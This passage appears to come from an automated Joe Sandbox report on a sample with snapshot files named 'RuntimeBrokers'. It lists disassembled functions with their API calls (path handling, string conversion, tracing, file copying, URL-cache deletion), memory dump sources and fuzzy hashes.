                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(00000002,?,?,?,?,?,?,00000058), ref: 6C17E410
                                        • ?ZipFilesToFile@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$vector@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$allocator@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@4@0@Z.COMMON(?,?,?), ref: 6C17E45F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$V?$allocator@$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@U?$char_traits@V?$basic_string@W@2@@4@@$H_prolog3_W@2@@std@@$File@common@ierd_tgp@@FilesV?$vector@W@2@@std@@@2@@4@0@
                                        • String ID:
                                        • API String ID: 3245351383-0
                                        • Opcode ID: c2ada36705019117df6da72e2a9846033dbe8d0ca1a6c99d9edaa86f971db80e
                                        • Instruction ID: d187edd1f46ea1a1e6858eb85295d17195ac5dc44b81e6cc767c38d06b04d40c
                                        • Opcode Fuzzy Hash: c2ada36705019117df6da72e2a9846033dbe8d0ca1a6c99d9edaa86f971db80e
                                        • Instruction Fuzzy Hash: B541E2B1C05248DFDB10CFA9C980ADDFBF4BF19314FA4416AD519BB680D734AA49CBA1
                                        Function 6C0DA658 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DA67C
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DA692
                                        • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 6C0DA69E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$Pninc@?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 2538508077-0
                                        • Opcode ID: 715a21913c302dcb5e55750ec5bf271a731afcd0dceb1ce8e726ca1f8c3c840c
                                        • Instruction ID: c0a8dd241155bfad664c471e207991134808a11be791cab70bcdb2be18b92515
                                        • Opcode Fuzzy Hash: 715a21913c302dcb5e55750ec5bf271a731afcd0dceb1ce8e726ca1f8c3c840c
                                        • Instruction Fuzzy Hash: 6B316D31610209EBCF01DFA9C884ADEBBFDBF09354B254216E501E3A40DB70FA548BA0
                                        Function 6C166F83 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C166F8D
                                        • ?GetInstance@InfoTraceSystem@trace_system@ierd_tgp@@SAAAV123@XZ.COMMON(000000F0), ref: 6C166FAD
                                        • ?GetUIN@InfoTraceSystem@trace_system@ierd_tgp@@QAEIXZ.COMMON(?,000000F0), ref: 6C166FC2
                                        • ?GetTraceInstanceID@InfoTraceSystem@trace_system@ierd_tgp@@QAE_K_KII@Z.COMMON(?,00000000,00000000,?,000000F0), ref: 6C166FCD
                                          • Part of subcall function 6C1663C1: __EH_prolog3.LIBCMT ref: 6C1663C8
                                        • ?TraceInfo@InfoTraceSystem@trace_system@ierd_tgp@@QAE_N_KABUTraceInformation@23@@Z.COMMON(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C1670CD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Trace$InfoSystem@trace_system@ierd_tgp@@$H_prolog3H_prolog3_Info@Information@23@@InstanceInstance@V123@
                                        • String ID:
                                        • API String ID: 1333543344-0
                                        • Opcode ID: 067a9cb861c62c46a78fc1973c8d9aedfa0c0bc2473550b7ba1175a8872b29a0
                                        • Instruction ID: 0dfa15f1c2eaec318dfcdcc1f4560ba7c4ee8c6d205495a613e15dc797ff62ac
                                        • Opcode Fuzzy Hash: 067a9cb861c62c46a78fc1973c8d9aedfa0c0bc2473550b7ba1175a8872b29a0
                                        • Instruction Fuzzy Hash: FD412971A002199FDF20DFA4C850BECBBF5BF08214F048199E859A7B50EB309E99DF50
                                        Function 0041E3E1 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: htonl
                                        • String ID:
                                        • API String ID: 2009864989-0
                                        • Opcode ID: 81e8073440279d122efbcef5582ad8a1f095106474564544a59ea15bc4c1ade7
                                        • Instruction ID: 1c0effcb3ccf145a1236c1b5ca887aa6765e7ecefa049b124e51532ef2ec91d6
                                        • Opcode Fuzzy Hash: 81e8073440279d122efbcef5582ad8a1f095106474564544a59ea15bc4c1ade7
                                        • Instruction Fuzzy Hash: CD410674A00219CFDF08CF98D996AEEBBF1FF18315F114029E616AB290D734A941CB55
                                        Function 6C12EDB4 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12EDBB
                                        • ?str_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,?,?,?,?,?,0000006C), ref: 6C12EDED
                                          • Part of subcall function 6C1301EA: __EH_prolog3_GS.LIBCMT ref: 6C1301F1
                                          • Part of subcall function 6C1301EA: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,0000001C,6C12F183,?,?,00000064,6C0C7177,?,?,?,?), ref: 6C13021C
                                        • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?,?,?,0000006C), ref: 6C12EE0B
                                          • Part of subcall function 6C1029BB: __EH_prolog3_GS.LIBCMT ref: 6C1029C2
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON ref: 6C12EE21
                                          • Part of subcall function 6C0BFACF: __EH_prolog3.LIBCMT ref: 6C0BFAD6
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?path_to_str@common@ierd_tgp@@YA_NABVpath@filesystem@2@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,00000000), ref: 6C12EE4D
                                          • Part of subcall function 6C130002: __EH_prolog3_GS.LIBCMT ref: 6C130009
                                          • Part of subcall function 6C130002: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,0000001C), ref: 6C13002E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$D@2@@std@@W@2@@std@@$?filename@path@filesystem@ierd_tgp@@?path_to_str@common@ierd_tgp@@?str_to_path@common@ierd_tgp@@?u16to8@common@ierd_tgp@@?u8to16@common@ierd_tgp@@?wstring@path@filesystem@ierd_tgp@@D@2@@4@@D@2@@std@@@H_prolog3V123@Vpath@filesystem@2@Vpath@filesystem@2@@W@2@@4@@memmove
                                        • String ID:
                                        • API String ID: 1909183909-0
                                        • Opcode ID: ca48e77538bc6e7891e1c2d8e1cafdea708ba37720bd06e834a6fff850be83f5
                                        • Instruction ID: f6a7b5cac81ef7ed7d604fd71da868f3157e5d60d2b9602d59cf202ae9f58797
                                        • Opcode Fuzzy Hash: ca48e77538bc6e7891e1c2d8e1cafdea708ba37720bd06e834a6fff850be83f5
                                        • Instruction Fuzzy Hash: 333134B5C05348DAEB14CFA8C8917DCFBB0AF28318F64025ED115BB692D7391A89CB50
                                        Function 6C176359 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: ca278fb992ed655b63673e8fcd937c12d84197e59032de9b31ea4118ae015215
                                        • Instruction ID: d680486fa3a607fef7c948b760132d8dda52f30d506b1eb5baf7d54dffebb3d0
                                        • Opcode Fuzzy Hash: ca278fb992ed655b63673e8fcd937c12d84197e59032de9b31ea4118ae015215
                                        • Instruction Fuzzy Hash: D031CE31915249EFCB04CFACC881A8E7FB4AF05314F60455AE114EB6D2C734DA84CFA2
                                        Function 6C106046 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 6C10608B
                                        • DeleteUrlCacheEntry.WININET(?), ref: 6C1060B2
                                        • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 6C1060C1
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,6C105E21,00000001,?), ref: 6C1060CF
                                        • FindCloseUrlCache.WININET(00000000), ref: 6C1060F7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Cache$EntryFind$CloseDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2077925056-0
                                        • Opcode ID: 2cd97bfb27227e549dd24c49790427d6cd3ec6f69ee37278714cb2adecc0e8ce
                                        • Instruction ID: bc8022c544f64dcb84ce4b295bc1b1748e8afcb787618260184faf21eff1713a
                                        • Opcode Fuzzy Hash: 2cd97bfb27227e549dd24c49790427d6cd3ec6f69ee37278714cb2adecc0e8ce
                                        • Instruction Fuzzy Hash: 7121D4B6B4161DABE7158F64C844AAF7BBCEF41364F208419EC05D7644DF34EE808B61
                                        Function 6C0FF8BD Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FF8C4
                                        • GetTickCount.KERNEL32 ref: 6C0FF8FD
                                        • ?MD5String@@YAPADPAD@Z.COMMON(00000000), ref: 6C0FF91F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000001), ref: 6C0FF94D
                                        • __Init_thread_footer.LIBCMT ref: 6C0FF9BC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CountH_prolog3_Init_thread_footerString@@Tickfree
                                        • String ID:
                                        • API String ID: 313641035-0
                                        • Opcode ID: c22455c5d9e90ee046614d7e98b3f6e073d4b57831f65224baf80d3e65ebaa1a
                                        • Instruction ID: 76a04f43c421816f9d6092684a2a7fb530137b9e0f9619e1dbcd4a3fa352801b
                                        • Opcode Fuzzy Hash: c22455c5d9e90ee046614d7e98b3f6e073d4b57831f65224baf80d3e65ebaa1a
                                        • Instruction Fuzzy Hash: 3421D0B1A042459FDB14EF69D054BDDBBF4AB8A314F14025FF4059BB80CB38958BCB15
                                        Function 6C10A272 Relevance: 7.6, APIs: 5, Instructions: 71fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10A279
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                          • Part of subcall function 6C0B6B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C438534,6C0B6BB1,6C438538,?,6C0BA235,00000000,?,00000010), ref: 6C0B6B81
                                          • Part of subcall function 6C0B6B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0B6B8D
                                        • ?is_directory@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,0000003C,6C10AB09,00000005), ref: 6C10A2C6
                                        • ?CopyDir@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@0@Z.COMMON(?,?,?,?,0000003C,6C10AB09,00000005), ref: 6C10A2D9
                                          • Part of subcall function 6C14F646: __EH_prolog3_catch_GS.LIBCMT ref: 6C14F650
                                          • Part of subcall function 6C14F646: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000130), ref: 6C14F678
                                          • Part of subcall function 6C14F646: ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000130), ref: 6C14F683
                                          • Part of subcall function 6C14F646: ??0directory_iterator@filesystem@ierd_tgp@@QAE@ABVpath@12@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000130), ref: 6C14F690
                                          • Part of subcall function 6C14F646: ?equal@directory_iterator@filesystem@ierd_tgp@@QBE_NABV123@@Z.COMMON(00000000), ref: 6C14F6BC
                                          • Part of subcall function 6C14F646: ?path@directory_entry@filesystem@ierd_tgp@@QBE?BV023@XZ.COMMON(?,00000000), ref: 6C14F6EC
                                          • Part of subcall function 6C14F646: ?is_directory@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,00000000), ref: 6C14F6F9
                                          • Part of subcall function 6C14F646: ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000000), ref: 6C14F711
                                          • Part of subcall function 6C14F646: ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?,00000000), ref: 6C14F71E
                                        • ?create_directory_for_file@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,0000003C,6C10AB09,00000005), ref: 6C10A2E8
                                        • CopyFileW.KERNEL32(?,?,00000001,?,?,0000003C,6C10AB09,00000005), ref: 6C10A308
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Sys_wrapper@common@ierd_tgp@@Vpath@12@@$?is_directory@filesystem@ierd_tgp@@CopyU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$??0directory_iterator@filesystem@ierd_tgp@@??0path@filesystem@ierd_tgp@@?create_directory_ex@?create_directory_for_file@?equal@directory_iterator@filesystem@ierd_tgp@@?exists@filesystem@ierd_tgp@@?filename@path@filesystem@ierd_tgp@@?path@directory_entry@filesystem@ierd_tgp@@Dir@Execute_once@std@@FileH_prolog3_H_prolog3_catch_Uonce_flag@1@V023@V123@V123@@Verror_code@std@@@Vpath@12@Vpath@filesystem@3@0@Vpath@filesystem@3@@memmoveterminate
                                        • String ID:
                                        • API String ID: 411637254-0
                                        • Opcode ID: 1be9f1418e99ea915c4739e0d3ebb21e28033e2f53ff40ca9b7f09e5808f8d29
                                        • Instruction ID: d6d792f0f190cb19c710f4be7f135c3522cafa537269d61dd2a7f5f620b5f01e
                                        • Opcode Fuzzy Hash: 1be9f1418e99ea915c4739e0d3ebb21e28033e2f53ff40ca9b7f09e5808f8d29
                                        • Instruction Fuzzy Hash: 35215A71900248DFCF05DFA4C894ADDBBB8AF18308F94412AE515B7690DB39EB49CB60
                                        Function 6C0EA204 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C0EA20E
                                        • ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6C0EA22B
                                          • Part of subcall function 6C0BE91A: ?has_root_name@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON(?,6C10097A), ref: 6C0BE91D
                                          • Part of subcall function 6C0BE91A: ?has_root_directory@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON(?,6C10097A), ref: 6C0BE928
                                        • ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?), ref: 6C0EA246
                                          • Part of subcall function 6C101BCB: __EH_prolog3.LIBCMT ref: 6C101BD2
                                          • Part of subcall function 6C101BCB: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000,0000000C,6C1009B4,?), ref: 6C101BEE
                                        • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?), ref: 6C0EA259
                                        • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,00000000,?), ref: 6C0EA274
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Vpath@12@$?current_path@filesystem@ierd_tgp@@$??0path@filesystem@ierd_tgp@@?absolute@filesystem@ierd_tgp@@?has_root_directory@path@filesystem@ierd_tgp@@?has_root_name@path@filesystem@ierd_tgp@@?is_absolute@path@filesystem@ierd_tgp@@H_prolog3H_prolog3_catch_U?$char_traits@_V312@0@V?$allocator@_V?$basic_string@_Verror_code@std@@@W@2@@std@@@W@std@@
                                        • String ID:
                                        • API String ID: 2341604710-0
                                        • Opcode ID: e587f11125ce5dbc30cb7dc76dca7e4491c5f27ad552f2c7d104f486a90f28fc
                                        • Instruction ID: 9a13559a184fb4e21cbefe01e4d325fe9561beeef7ab8d641ed4ecd8e56bed31
                                        • Opcode Fuzzy Hash: e587f11125ce5dbc30cb7dc76dca7e4491c5f27ad552f2c7d104f486a90f28fc
                                        • Instruction Fuzzy Hash: 5C2146B0D45248EEEB10CFA8C944BCDBBF4AF19318F208198D11477681CBB55B48CB62
                                        Function 6C0DAAF1 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DAAFC
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DAB0D
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DAB1E
                                        • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 6C0DAB2E
                                        • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0DAB6B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
